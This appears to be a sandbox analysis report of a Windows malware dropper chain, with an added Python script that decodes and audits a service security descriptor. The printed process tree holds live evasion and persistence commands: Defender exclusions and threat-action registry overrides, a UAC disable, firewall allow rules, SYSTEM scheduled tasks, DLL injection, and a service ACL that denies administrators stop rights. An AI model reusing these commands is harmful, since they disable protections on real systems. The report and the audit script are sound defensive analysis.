PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2316 wrote to memory of 3544 | 2316 | file300un.exe | 91
PID 2316 wrote to memory of 3544 | 2316 | file300un.exe | 91
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 2316 wrote to memory of 4964 | 2316 | file300un.exe | 93
PID 4964 wrote to memory of 2736 | 4964 | regsvcs.exe | 97
PID 4964 wrote to memory of 2736 | 4964 | regsvcs.exe | 97
PID 4964 wrote to memory of 2736 | 4964 | regsvcs.exe | 97
PID 4964 wrote to memory of 2888 | 4964 | regsvcs.exe | 98
PID 4964 wrote to memory of 2888 | 4964 | regsvcs.exe | 98
PID 4964 wrote to memory of 2888 | 4964 | regsvcs.exe | 98
PID 4964 wrote to memory of 2244 | 4964 | regsvcs.exe | 99
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe"C:\Users\Admin\AppData\Local\Temp\2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 8364⤵
- Program crash
PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\Pictures\b1nbwn523WEOir6D5RHSIeEr.exe"C:\Users\Admin\Pictures\b1nbwn523WEOir6D5RHSIeEr.exe"5⤵
- Executes dropped EXE
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\u240.0.exe"C:\Users\Admin\AppData\Local\Temp\u240.0.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\u240.1.exe"C:\Users\Admin\AppData\Local\Temp\u240.1.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD17⤵PID:5568
-
-
-
-
C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"5⤵
- Executes dropped EXE
PID:2888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:4488
-
-
C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5988
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:4188
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:724
-
-
-
-
C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"5⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5812
-
-
C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:5508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5708
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5984
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:3904
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2716
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2164
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:652
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:5176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:2196
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5976
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:5824
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:520
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:684
-
-
-
-
-
-
-
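The `sc sdset WinDefender ...` pair above rewrites the security descriptor of a service named WinDefender (not the built-in Defender service, whose name is WinDefend). The part worth reading is the ACE `(D;;WPDT;;;BA)`: it denies Stop (WP) and Pause/Continue (DT) to Builtin Administrators, and the Administrators allow ACE next to it has had those same two rights removed, so an elevated `sc stop` or a stop from services.msc fails with access denied. The Python below is an added example, not part of this report or of the sample; it decodes the descriptor with the two-letter rights and trustee tables that sc.exe applies to service objects and flags ACEs that keep administrators from controlling the service. `DEFAULT_SDDL` is a typical default service DACL constructed here for comparison, and `CONTROL_RIGHTS` is my own choice of which rights count as control.

```python
import re
from typing import FrozenSet, List, NamedTuple

# Two-letter SDDL rights tokens as sc.exe maps them onto service access bits.
SERVICE_RIGHTS = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus",
    "SW": "EnumerateDependents", "RP": "Start", "WP": "Stop",
    "DT": "PauseContinue", "LO": "Interrogate", "CR": "UserDefinedControl",
    "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac", "WO": "WriteOwner",
    "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite", "GX": "GenericExecute",
}
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
            "SU": "ServiceLogon", "AU": "AuthenticatedUsers", "WD": "Everyone"}
# Rights an administrator needs to stop, reconfigure or remove a service (my choice).
CONTROL_RIGHTS = frozenset({"Stop", "PauseContinue", "ChangeConfig", "Delete", "WriteDac"})

SECTION_RE = re.compile(r"([DS]):((?:\([^)]*\))*)")   # D:(...)(...)  S:(...)
ACE_RE = re.compile(r"\(([^)]*)\)")

# Descriptor copied from the sc sdset line in this report.
PAGE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed for comparison: a typical default service DACL (Administrators keep WP and DT).
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")


class Ace(NamedTuple):
    acl: str                # "D" = DACL, "S" = SACL
    kind: str               # A = allow, D = deny, AU = audit
    rights: FrozenSet[str]  # decoded right names
    trustee: str            # decoded trustee name


def parse_service_sddl(sddl: str) -> List[Ace]:
    """Decode every ACE of a service security descriptor in string form."""
    aces: List[Ace] = []
    for acl, body in SECTION_RE.findall(sddl):
        for fields in (ace.split(";") for ace in ACE_RE.findall(body)):
            if len(fields) != 6:
                raise ValueError(f"malformed ACE: {fields}")
            kind, _flags, rights, _obj, _inherit, sid = fields
            if rights.lower().startswith("0x"):
                names = frozenset({rights})          # numeric mask: keep verbatim
            else:                                    # two-letter tokens, decoded pairwise
                names = frozenset(SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                                  for i in range(0, len(rights), 2))
            aces.append(Ace(acl, kind, names, TRUSTEES.get(sid, sid)))
    return aces


def audit_service_sddl(sddl: str) -> List[str]:
    """Flag DACL entries that keep Administrators (or SYSTEM) from controlling the service."""
    findings: List[str] = []
    for ace in parse_service_sddl(sddl):
        if ace.acl != "D":
            continue
        if ace.kind == "D" and ace.trustee in ("Administrators", "LocalSystem"):
            blocked = sorted(ace.rights & CONTROL_RIGHTS)
            if blocked:
                findings.append(f"deny {','.join(blocked)} to {ace.trustee}")
        if ace.kind == "A" and ace.trustee == "Administrators" and "GenericAll" not in ace.rights:
            missing = sorted(CONTROL_RIGHTS - ace.rights)
            if missing:
                findings.append(f"Administrators allow ACE lacks {','.join(missing)}")
    return findings
```

Note what the descriptor does not take away: the Administrators allow ACE still grants WriteDac (WD) and Delete (SD), so an elevated `sc sdset WinDefender <default descriptor>` restores control and `sc delete` still works; only stop and pause are blocked, and LocalSystem is unaffected.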
C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"5⤵
- Executes dropped EXE
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2892
-
-
-
C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:5940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2556
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2764
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:4476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1200
-
-
-
-
C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"5⤵
- Executes dropped EXE
PID:2420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5848
-
-
C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4208
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:3668
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:5636
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2092
-
-
-
-
C:\Users\Admin\Pictures\smyDlk5Es9ywvt8vYzqP4xsg.exe"C:\Users\Admin\Pictures\smyDlk5Es9ywvt8vYzqP4xsg.exe"5⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1784
-
-
C:\Users\Admin\Pictures\w5WMABIkihlCRso1g89r14TE.exe"C:\Users\Admin\Pictures\w5WMABIkihlCRso1g89r14TE.exe"5⤵
- Executes dropped EXE
PID:4116 -
C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:5160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:5256
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:5320
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:5332
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵PID:5348
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:5380
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:5404
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵PID:5464
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:5480
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:5492
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵PID:5508
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:5524
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:5536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:5552
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵PID:5824
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵PID:6140
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:5144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5212 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe\" it /NhedidIXUK 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5684
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵PID:5740
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵PID:4232
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵PID:924
-
-
-
-
-
-
C:\Users\Admin\Pictures\EGijUa0yZwO1E3ULKTt8Y0Pe.exe"C:\Users\Admin\Pictures\EGijUa0yZwO1E3ULKTt8Y0Pe.exe"5⤵
- Executes dropped EXE
PID:5656 -
C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:5728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:2868
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:5696
-
